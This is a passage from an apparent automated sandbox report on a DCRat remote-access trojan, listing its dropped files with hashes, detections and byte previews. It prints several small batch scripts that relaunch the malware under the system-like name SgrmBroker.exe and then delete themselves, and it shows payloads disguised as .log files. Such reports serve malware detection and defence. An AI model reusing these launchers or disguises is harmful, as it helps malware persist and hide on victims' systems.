                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\smss.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......~............... ........@.. ..............................qX....@.....................................K.......p............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...l...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\91e168f4ec1147

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (808), with no line terminators
                                    Category:dropped
                                    Size (bytes):808
                                    Entropy (8bit):5.914538938523479
                                    Encrypted:false
                                    SSDEEP:24:sQmAPxCuGiQLSl9L1EGubJ1iDTdg4bWwerhe1mWQv:/BEZ+LStbPiDbbWwasJQv
                                    MD5:D6C172655513F15E91D30EA488FD4982
                                    SHA1:5E77DD7966A80D8A54045581AE94639C72E1EB7B
                                    SHA-256:69DF0AA1E03580B3AD53802C0146E1FE6BFA722EB169BD396345410F7E779406
                                    SHA-512:731CE2B98B5C2635A17AB01EAC7DAEFB89E89D86960435DA35057C745362880ABC6380635A3F9A50BB087BDAFCCA9241CAC0D46752F4AA6DCB2C472B6B05F36C
                                    Malicious:false
                                    Preview:98dDoxSmmNa7MRv40LdQ0wJ7Cdsj7kqXEEZiQtDonKbLqX90nwnHYW7NzfBLFspCgD3I1NoHIynqU8Rpd26K6j8rGMtvs1j4fYone08ZIg9ktQ21NVrMweG7ELBod3ZQOsL5ToLn3gBZjY80U2iWKWIASriSyT6PHsVAE6hiKETPcqXpMLUlUCG1jLnlF2yjkwS1D7vXU9MGC3hmU3Fn9U4Elda3T5cRPuoqYfmPZ6QV0AyqnARMxKjP1NQjg1EYh40SO1OyQ0NCDjOkouQSoPeFKYyKPCsi22y5Kgcvwc567hMS9p4wlvuRauHzDEjOIpKLvSaIRegLUhInMfKkH56GIgfZYnsr3rxRWAhrOwfGOi72memh49GNsECOxAtnwySmt0RL8cVUZ01kjmw4BLx3kkjS8T4ND1UaPUIwMajbovx1McoLOymlBZBJQ8NoiHRhgbVPdArklWPzwrFfps9POsZzS9fOM42gePVuHYrNGC9oJMWj2s9zHCTxCf7dedXrdsUhVVYQBwIMtupFn6Ve4CYc6islbOtmpRKb2yNhUtyV3GDSz1zhI2xaT2kxmwywCfhcjONytxKLODizeawkYMewetH9OZ5h5CTYjlslnByUrmMQUvTMANX0Bu7zHOkT2nPMuKP2sK6XYJE2h0pdGthrodWzo2dZaecEWAgKfadzRAb1pFSQjHNJFihQxaOzrh63q9ggUe7pPrZoBfJjjN0TRT9xcPXEMoIuDiLqiv5EJh3XJ3PRRpPdqnmXAtEEH3dkjpldTdAyRwJtZlojAFxgYoDZ5ypzr16Q

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......~............... ........@.. ..............................qX....@.....................................K.......p............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...l...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                    C:\Users\Default\Saved Games\853308c8279864

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with very long lines (813), with no line terminators
                                    Category:dropped
                                    Size (bytes):813
                                    Entropy (8bit):5.899145702506883
                                    Encrypted:false
                                    SSDEEP:24:ECU+lXFIF7HCK9MQdQ9JUbUrLSmzusDxfxgXA4O:ECU+lSdHCmMnJ5rLlNxgQ4O
                                    MD5:FB166FC379AEE109517CC6672217CAA6
                                    SHA1:DD7F2883DCBC950DE9018E57A6DE28E2DF63C8A4
                                    SHA-256:74F26FE88B4A45F68227F40CB0F8E73F6BB13DA23D55637044FD031418ACE90F
                                    SHA-512:77E2D70F6AE0CED606BAAAEADB975C5401B250B1B54A8D176C990ED61555DFD1CBB530DD1EE13C0505C1682A4D14EEA1FAF6B207BA00FEF65178375F7C068157
                                    Malicious:false
                                    Preview:pbM4d27ZEeECG6M4lLhfxKGa03qGwKROG816cJ5D0QuNw3JGG41FOcBeVvDkM0m4M05HFPbcQeogZ3n6tjA2SMAo7WlqFV09n0A67CB0cZztxeFbHH0m0ulA0RJsovW5no2i2r8rhJa3WQ0dRJi8eOJ3PAGq2TLqC3GIlgjaIJFqUrnjaqbeMYaZf9T2lSyO7t0cKr1ukIzVJcjhWgPM1reodqnmMqy0U0sl1KYtyq4EiEQDawgFClWQPL9eEPh3U8ASt8pLHgXKwZFYajLaKtysdcVpL4ojJAujE7TcGU7gNLdzGlDeDHtkKRzRmAAN1yBwpfUcQtTzvReR8gjk1KfCRJZwIBzGUuoZKrJkRkOUx3y3whTFaaVrT9fgGhUO3NfBmFHQW9SQ5LOYUf9ksup4Y7FKMndtQ9akXxQraCtbHFvIvHLkitgJhknpA7Esfj96uoAgPSKpANxSL7ZEc2KgdQCwKkrc7A6hFzXHGoVQi0ITxUdChAQmZcddlNWokrsARPNWkS7xh38mIt90Ho57uTImW3f3Sqp1IIBiHHcPCcFfe0V2Ogh6wuP8GkAqwEf1NGe9ratAMp5ROnIfhnpwJtEX2DbgGvd77ORXVWKxwhtHz8tdbeJIZtreCHGn9M3aL7UAVuKLc19m96h4U7FmmUiNgxVOPhxknT51ntIrT8phtFeFjMTCHRx1ZGehY655EY8qBqRkyXSooAeaTPoDNvdWfEchOkSXCtcVHxE35sNt8JMYmDOJR1sT5mK7NtVOE4l4hITfLuIfhtXW1D4LWJFKBJZfmHpLW9oEhR0du

                                    C:\Users\Default\Saved Games\IadHSrMxJwYAMPkyRTLDEKgeW.exe

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):689664
                                    Entropy (8bit):5.558791715418654
                                    Encrypted:false
                                    SSDEEP:12288:exT1OIVnGV9J3I3SyKnUqIh5jiXPrQfkXmm1RhdLB9XFy+Bm67+:exJMVI3SyKnUh9E1bm67+
                                    MD5:88475FFCF70BAFDA27644064BD214F2A
                                    SHA1:650DEB8EEE1F3614FF924C2AC5DAD5A2F230DCE1
                                    SHA-256:F2BD4F56C501098299B88CEFECFD79E763D95D801016EAAF4E2707C5FFC7C767
                                    SHA-512:C3E7C4D38D43571FD81926AECF3F0BD75F728F1E7056AF02955EED96BEA67EFD30F295089300DF809841C0565A9EA4AA793E2F5C6B93E3EB86132CCCC267376F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 83%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."......~............... ........@.. ..............................qX....@.....................................K.......p............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...p...........................@..@.reloc..............................@..B.......................H.......T...l...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SgrmBroker.exe.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1613
                                    Entropy (8bit):5.370675888495854
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                    MD5:CFCC907668E9B1AED46D457F77536393
                                    SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                    SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                    SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperBlockCrtCommon.exe.log

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):1613
                                    Entropy (8bit):5.370675888495854
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                    MD5:CFCC907668E9B1AED46D457F77536393
                                    SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                    SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                    SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Temp\03Hmf4YpRZ

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.103465189601646
                                    Encrypted:false
                                    SSDEEP:3:3SVimd:iXd
                                    MD5:E38D1E302F867B6B193AB00C548CBF11
                                    SHA1:702BECBB6F0ADD816BCA1E3BA2F3FA51D6444797
                                    SHA-256:ED2FCBC789C6A3FB664A834ED782E910F69B5DC44EBD2494D38BBE2D19A7EFA8
                                    SHA-512:CCBC537B9AB8DDD44DB4E2E66F41ABDD4422499D5829A02EF0D9A712888FB2751E7C2B1037B86B72C29FCC2C0DC953139B401AA1C7DA638AE8CCA788CBA2A6EC
                                    Malicious:false
                                    Preview:CaqCFwZrbhwD40JhTuB3h6CXF

                                    C:\Users\user\AppData\Local\Temp\1dc23k5BXS.bat

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):182
                                    Entropy (8bit):5.12810937060124
                                    Encrypted:false
                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQQ0RFofD6CvbBktKcKZG1N+E2J5xAIZZQnSqn:hCRLuVFOOr+DE1WD5um0KOZG1N723fZq
                                    MD5:BD6648A01E1CA2823ED47955B2AA0F16
                                    SHA1:8F789F9035E4476D62B69EB6C2169DE857FF6A0A
                                    SHA-256:69F60B2A4D7417BEA5974444506C246EB152EF668A8F07B4A207107C24733187
                                    SHA-512:E2AFD8F8D81F9C213A9C1B6AD29A01C67120177EECC0EF507439354DC6947F59C5F1F34540063A5C2396511291C4E9F7FD9E9F0F6B9166A1DAB1832E6943D12B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1dc23k5BXS.bat"

                                    C:\Users\user\AppData\Local\Temp\Y6Uf3masa9.bat

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):230
                                    Entropy (8bit):5.070001010282303
                                    Encrypted:false
                                    SSDEEP:6:hCijTg3Nou1SV+DE1WD5um0KOZG1N723f6:HTg9uYDEo3PaC
                                    MD5:4BCA9CFEA3C9528BE5ACE2C878BC4D41
                                    SHA1:9EB7E5954AC79610A5BF91D0D50BB18D0E1B4512
                                    SHA-256:39C08132D24AB6133A54341873867B120E6009E2E158A8E9C1DEB5FB42427ADD
                                    SHA-512:27694EA4CAB22CA4867D82E3C39DB37E2EB0C24848901BE9E6C74E6EC6A39F3938F02C3BBC4F627F907643FCF3A9B62A5E1B0C36D40722CF75A9C81BB464759C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Y6Uf3masa9.bat"

                                    C:\Users\user\AppData\Local\Temp\dTnnyVXz72

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.133660689688185
                                    Encrypted:false
                                    SSDEEP:3:fBVGe0JD:5kLJD
                                    MD5:50470D25BBBF9B8EFC99335B7E06540C
                                    SHA1:E1C87FBC4C383E1EFABD7AB413BFEB6DACB6A162
                                    SHA-256:51101EBFDA97A87D73B13A0E7DFB4F34CE6B5A64EBDA5F65FAAE062EE3BEF904
                                    SHA-512:9A9D445E11B21FAFC414AA1E455D1FE018E81F2CE2AAF3BCA57DE07C498021DBCA498828A0B017529A5920FC44CD8B339C60C13ACFA4228C9DEEC666FE248E77
                                    Malicious:false
                                    Preview:4KGgg7CDuuhV2Y8dDKQ1yLCCB

                                    C:\Users\user\AppData\Local\Temp\fmCyxdZe80.bat

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):182
                                    Entropy (8bit):5.1026033485626225
                                    Encrypted:false
                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQQ0RFofD6CvbBktKcKZG1N+E2J5xAIGmsJ4RK:hCRLuVFOOr+DE1WD5um0KOZG1N723f8
                                    MD5:9679E1604C5863446A9181D4AB5AE969
                                    SHA1:486B0454D359B9533ADA510AD6FCA6579F8347B7
                                    SHA-256:D2355B2F452D8CF5667A9BD7B01E41265418E2E8D12FB82D49ADB76C4C7ED5D4
                                    SHA-512:563D96220E85CD230AFCB9A08755DC6F9FA8C8AB3B19D488F5169AD34308AFF092A4C6471A70116483EDA7E088721AC11C5A8140B326BF4652E77AD9307265F9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\fmCyxdZe80.bat"

                                    C:\Users\user\AppData\Local\Temp\g5xIAnyS9b

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):3.8594705707972508
                                    Encrypted:false
                                    SSDEEP:3:hX37HVn:nn
                                    MD5:F1C48EE3BC57DA0E8CB447C1A6FEF6D4
                                    SHA1:A8BC58F989C4070BF4B12F2ECAA2053AD8BBE69A
                                    SHA-256:AF5D3F8ECF9476750B152153E03B75DC6AAAA42CDCD9AB5FC9B110626E9A01F1
                                    SHA-512:2CD73A36B35DFB18A716162B5E5546B0B2C4D31A1BF17FBA9839C85C5BE96DD16C863AE581F4F3D28222F3F0FD1FB0995C72131C33A0E384A0FDEA45F0BC21DD
                                    Malicious:false
                                    Preview:03NXXhs5T9XXpeBeleebeuHnD

                                    C:\Users\user\AppData\Local\Temp\gQ3ZGmOMEF

                                    Download File
                                    Process:C:\Intorefnet\hyperBlockCrtCommon.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.403856189774723
                                    Encrypted:false
                                    SSDEEP:3:ktyrSqhZQn:YQSQu
                                    MD5:91A1E01BB2B06C5B6A398F0AD81A9538
                                    SHA1:AC4825EA279F45D3C17FE719B753B92A93686833
                                    SHA-256:AAFCDD6A0973A194815311495B944D8CC9596D3ABD30665CA67F716EB2EAEE4D
                                    SHA-512:41058D42F6EE41828F68311A4B4326752BDBFD9372135D6842748BBF780933D85200276499D91350DE3B6DE8F18ABFE0DDF3716A33685FA90A5F1F8C3CA3EAB1
                                    Malicious:false
                                    Preview:ERzwDsAAzWlJtjV7OBDGn39a5

                                    C:\Users\user\AppData\Local\Temp\r5G0btj0q4

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.483856189774723
                                    Encrypted:false
                                    SSDEEP:3:39cIKnEi2hXtE:n8Z2rE
                                    MD5:79D2ECEE4509E5BB6E9679A72B6C7E33
                                    SHA1:60C8B975A23BCDABC409A98E507AE57EEEF84680
                                    SHA-256:7CEDC7710CF78C739C0A66D2B41AC558EACAD715227E3682C11E7F80F6FA6AB7
                                    SHA-512:435997ABEA35C622C821B0A4B4BAFD3C54F49BCAEA8474DEBCF91685DBE52F2B82E704CF6A4184816E915E25BA5B472AA925DA3C038203F920B6ADFFA068DCB7
                                    Malicious:false
                                    Preview:fECwzy9mjWBa9vSFkcY3brRxa

                                    C:\Users\user\AppData\Local\Temp\szcAPjpm25.bat

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):182
                                    Entropy (8bit):5.106219329013348
                                    Encrypted:false
                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m1WDEQQ0RFofD6CvbBktKcKZG1N+E2J5xAIJKvK:hCRLuVFOOr+DE1WD5um0KOZG1N723fJL
                                    MD5:A62E6D4EC7668063EEB7BFBBF7167A83
                                    SHA1:6C07B071FEBE0EEB98DE6C15249333F001BF8DF4
                                    SHA-256:1D822827F71E0B8189A534CEDC270EE17BBE534A90C530BE0D8628BC7C746A11
                                    SHA-512:B6A73E6E72B3512E6AA6B9409D8B1B772286009F5E8B6BC1BB5CC46F93230B6C2A95B286A52487AE36447C86E4290D22745300CB930375DB7FD1FA4EC62415CD
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\szcAPjpm25.bat"

                                    C:\Users\user\AppData\Local\Temp\zuhvZR4ed0.bat

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):230
                                    Entropy (8bit):5.1192687760382904
                                    Encrypted:false
                                    SSDEEP:6:hCijTg3Nou1SV+DE1WD5um0KOZG1N723fM:HTg9uYDEo3PaU
                                    MD5:5C515DEB3DF8E8340550BFFF1688520C
                                    SHA1:B353B19AF5E7B3224087B9DFFDCD145878A90D9B
                                    SHA-256:807886272ED9A5655814289F6DA742471F4C68E9C5F15C7D5D6318726F7AC188
                                    SHA-512:09FE9B187925AE38D6DF32466A33072DE394C781A639FD85F48482E5D90A7425E9C4B968DC5672B23E35FB2437A428B8D97BDF411BEEF68CFEECB474D97C194F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\Default\Start Menu\Programs\SgrmBroker.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zuhvZR4ed0.bat"

                                    C:\Users\user\Desktop\AchrHOgY.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\BUHwkZnR.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 71%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                    C:\Users\user\Desktop\DYEovgjB.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SgrmBroker.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):85504
                                    Entropy (8bit):5.8769270258874755
                                    Encrypted:false
